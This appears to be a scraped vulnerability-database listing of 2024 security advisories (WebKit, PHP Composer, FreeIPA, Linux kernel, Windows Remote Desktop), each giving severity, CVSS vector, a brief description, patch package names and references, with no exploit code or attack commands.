ISHACK AI BOT

OS X update for Core Bluetooth (CVE-2022-48683) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

OS X update for Calendar (CVE-2022-32933) Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

OS X update for CoreServices (CVE-2023-40389) Severity 5 CVSS (AV:L/AC:M/Au:N/C:C/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

OS X update for ICU (CVE-2022-32897) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

Debian: CVE-2024-27820: webkit2gtk, wpewebkit -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 09/28/2024 Added 09/27/2024 Modified 01/28/2025 Description The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution. Solution(s) debian-upgrade-webkit2gtk debian-upgrade-wpewebkit References https://attackerkb.com/topics/cve-2024-27820 CVE - 2024-27820 DSA-5695-1

SUSE: CVE-2024-35242: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/10/2024 Created 06/21/2024 Added 06/21/2024 Modified 06/21/2024 Description Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories. Solution(s) suse-upgrade-php-composer2 References https://attackerkb.com/topics/cve-2024-35242 CVE - 2024-35242

Debian: CVE-2024-27830: webkit2gtk, wpewebkit -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 06/10/2024 Created 09/28/2024 Added 09/27/2024 Modified 01/28/2025 Description This issue was addressed through improved state management. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user. Solution(s) debian-upgrade-webkit2gtk debian-upgrade-wpewebkit References https://attackerkb.com/topics/cve-2024-27830 CVE - 2024-27830 DSA-5762-1

FreeBSD: VID-5F608C68-276C-11EF-8CAA-0897988A1C07 (CVE-2024-35242): Composer -- Multiple command injections via malicious git/hg branch names Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/10/2024 Created 06/13/2024 Added 06/11/2024 Modified 06/11/2024 Description Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories. Solution(s) freebsd-upgrade-package-php81-composer freebsd-upgrade-package-php82-composer freebsd-upgrade-package-php83-composer References CVE-2024-35242

OS X update for Liblouis (CVE-2022-32933) Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

Oracle Linux: CVE-2024-3183: ELSA-2024-3755:idm:DL1 security update (IMPORTANT) (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:S/C:C/I:C/A:N) Published 06/10/2024 Created 07/26/2024 Added 07/22/2024 Modified 01/07/2025 Description A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password. If a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password). Solution(s) oracle-linux-upgrade-bind-dyndb-ldap oracle-linux-upgrade-custodia oracle-linux-upgrade-ipa-client oracle-linux-upgrade-ipa-client-common oracle-linux-upgrade-ipa-client-epn oracle-linux-upgrade-ipa-client-samba oracle-linux-upgrade-ipa-common oracle-linux-upgrade-ipa-healthcheck oracle-linux-upgrade-ipa-healthcheck-core oracle-linux-upgrade-ipa-python-compat oracle-linux-upgrade-ipa-selinux oracle-linux-upgrade-ipa-server oracle-linux-upgrade-ipa-server-common oracle-linux-upgrade-ipa-server-dns oracle-linux-upgrade-ipa-server-trust-ad oracle-linux-upgrade-opendnssec oracle-linux-upgrade-python2-ipaclient oracle-linux-upgrade-python2-ipalib oracle-linux-upgrade-python2-ipaserver oracle-linux-upgrade-python3-custodia oracle-linux-upgrade-python3-ipaclient oracle-linux-upgrade-python3-ipalib oracle-linux-upgrade-python3-ipaserver oracle-linux-upgrade-python3-ipatests oracle-linux-upgrade-python3-jwcrypto oracle-linux-upgrade-python3-kdcproxy oracle-linux-upgrade-python3-pyusb oracle-linux-upgrade-python3-qrcode oracle-linux-upgrade-python3-qrcode-core oracle-linux-upgrade-python3-yubico oracle-linux-upgrade-slapi-nis oracle-linux-upgrade-softhsm oracle-linux-upgrade-softhsm-devel References https://attackerkb.com/topics/cve-2024-3183 CVE - 2024-3183 ELSA-2024-3755 ELSA-2024-3760 ELSA-2024-3754

Alpine Linux: CVE-2024-35241: Vulnerability in Multiple Components Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 08/23/2024 Added 08/22/2024 Modified 10/02/2024 Description Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting. Solution(s) alpine-linux-upgrade-composer References https://attackerkb.com/topics/cve-2024-35241 CVE - 2024-35241 https://security.alpinelinux.org/vuln/CVE-2024-35241

OS X update for Audio (CVE-2022-32897) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

OS X update for AppleMobileFileIntegrity (CVE-2022-48683) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

Alma Linux: CVE-2024-27851: Important: webkit2gtk3 security update (Multiple Advisories) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 10/22/2024 Added 10/21/2024 Modified 01/28/2025 Description The issue was addressed with improved bounds checks. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing maliciously crafted web content may lead to arbitrary code execution. Solution(s) alma-upgrade-webkit2gtk3 alma-upgrade-webkit2gtk3-devel alma-upgrade-webkit2gtk3-jsc alma-upgrade-webkit2gtk3-jsc-devel References https://attackerkb.com/topics/cve-2024-27851 CVE - 2024-27851 https://errata.almalinux.org/8/ALSA-2024-9636.html https://errata.almalinux.org/9/ALSA-2024-8180.html

Huawei EulerOS: CVE-2024-36971: kernel security update Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 06/10/2024 Created 10/09/2024 Added 10/08/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets. Solution(s) huawei-euleros-2_0_sp9-upgrade-kernel huawei-euleros-2_0_sp9-upgrade-kernel-tools huawei-euleros-2_0_sp9-upgrade-kernel-tools-libs huawei-euleros-2_0_sp9-upgrade-python3-perf References https://attackerkb.com/topics/cve-2024-36971 CVE - 2024-36971 EulerOS-SA-2024-2394

Debian: CVE-2024-27808: webkit2gtk, wpewebkit -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 09/28/2024 Added 09/27/2024 Modified 01/28/2025 Description The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution. Solution(s) debian-upgrade-webkit2gtk debian-upgrade-wpewebkit References https://attackerkb.com/topics/cve-2024-27808 CVE - 2024-27808 DSA-5695-1

OS X update for AppleAVD (CVE-2022-32933) Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

Huawei EulerOS: CVE-2024-36971: kernel security update Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 06/10/2024 Created 10/09/2024 Added 10/08/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets. Solution(s) huawei-euleros-2_0_sp10-upgrade-kernel huawei-euleros-2_0_sp10-upgrade-kernel-abi-stablelists huawei-euleros-2_0_sp10-upgrade-kernel-tools huawei-euleros-2_0_sp10-upgrade-kernel-tools-libs huawei-euleros-2_0_sp10-upgrade-python3-perf References https://attackerkb.com/topics/cve-2024-36971 CVE - 2024-36971 EulerOS-SA-2024-2441

Red Hat: CVE-2024-36971: kernel: net: kernel: UAF in network route management (Multiple Advisories) Severity 6 CVSS (AV:L/AC:H/Au:S/C:C/I:C/A:C) Published 06/10/2024 Created 08/13/2024 Added 08/12/2024 Modified 12/05/2024 Description In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets. Solution(s) redhat-upgrade-kernel redhat-upgrade-kernel-rt References CVE-2024-36971 RHSA-2024:5101 RHSA-2024:5102 RHSA-2024:5255 RHSA-2024:5363 RHSA-2024:5364 RHSA-2024:5365 RHSA-2024:5520 RHSA-2024:5521 RHSA-2024:5522 RHSA-2024:5523 View more

Ubuntu: (CVE-2024-27808): webkit2gtk vulnerability Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 11/21/2024 Added 11/19/2024 Modified 01/28/2025 Description The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution. Solution(s) ubuntu-upgrade-webkit2gtk References https://attackerkb.com/topics/cve-2024-27808 CVE - 2024-27808 https://webkitgtk.org/security/WSA-2024-0005.html https://www.cve.org/CVERecord?id=CVE-2024-27808

OS X update for CoreMedia (CVE-2022-32933) Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

OS X update for Accounts (CVE-2023-40389) Severity 5 CVSS (AV:L/AC:M/Au:N/C:C/I:N/A:N) Published 06/10/2024 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)

Microsoft Windows: CVE-2020-0817: Remote Desktop Client Remote Code Execution Vulnerability Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 06/27/2024 Added 06/10/2024 Modified 01/28/2025 Description Microsoft Windows: CVE-2020-0817: Remote Desktop Client Remote Code Execution Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb4537776 microsoft-windows-windows_10-1607-kb4537764 microsoft-windows-windows_10-1709-kb4537789 microsoft-windows-windows_10-1803-kb4537762 microsoft-windows-windows_10-1809-kb4532691 microsoft-windows-windows_10-1903-kb4532693 microsoft-windows-windows_10-1909-kb4532693 microsoft-windows-windows_server_2012-kb4537794 microsoft-windows-windows_server_2012_r2-kb4537803 microsoft-windows-windows_server_2016-1607-kb4537764 microsoft-windows-windows_server_2019-1809-kb4532691 References https://attackerkb.com/topics/cve-2020-0817 CVE - 2020-0817 https://support.microsoft.com/help/4532691 https://support.microsoft.com/help/4532693 https://support.microsoft.com/help/4537762 https://support.microsoft.com/help/4537764 https://support.microsoft.com/help/4537776 https://support.microsoft.com/help/4537789 https://support.microsoft.com/help/4537794 https://support.microsoft.com/help/4537803 View more

Red Hat: CVE-2024-27808: webkitgtk: Processing web content may lead to arbitrary code execution (Multiple Advisories) Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 11/28/2024 Added 11/27/2024 Modified 11/27/2024 Description The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution. Solution(s) redhat-upgrade-webkit2gtk3 redhat-upgrade-webkit2gtk3-debuginfo redhat-upgrade-webkit2gtk3-debugsource redhat-upgrade-webkit2gtk3-devel redhat-upgrade-webkit2gtk3-devel-debuginfo redhat-upgrade-webkit2gtk3-jsc redhat-upgrade-webkit2gtk3-jsc-debuginfo redhat-upgrade-webkit2gtk3-jsc-devel redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo References CVE-2024-27808 RHSA-2024:9638 RHSA-2024:9646

Red Hat: CVE-2024-27833: webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (Multiple Advisories) Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 06/10/2024 Created 11/28/2024 Added 11/27/2024 Modified 11/27/2024 Description An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5. Processing maliciously crafted web content may lead to arbitrary code execution. Solution(s) redhat-upgrade-webkit2gtk3 redhat-upgrade-webkit2gtk3-debuginfo redhat-upgrade-webkit2gtk3-debugsource redhat-upgrade-webkit2gtk3-devel redhat-upgrade-webkit2gtk3-devel-debuginfo redhat-upgrade-webkit2gtk3-jsc redhat-upgrade-webkit2gtk3-jsc-debuginfo redhat-upgrade-webkit2gtk3-jsc-devel redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo References CVE-2024-27833 RHSA-2024:9638 RHSA-2024:9646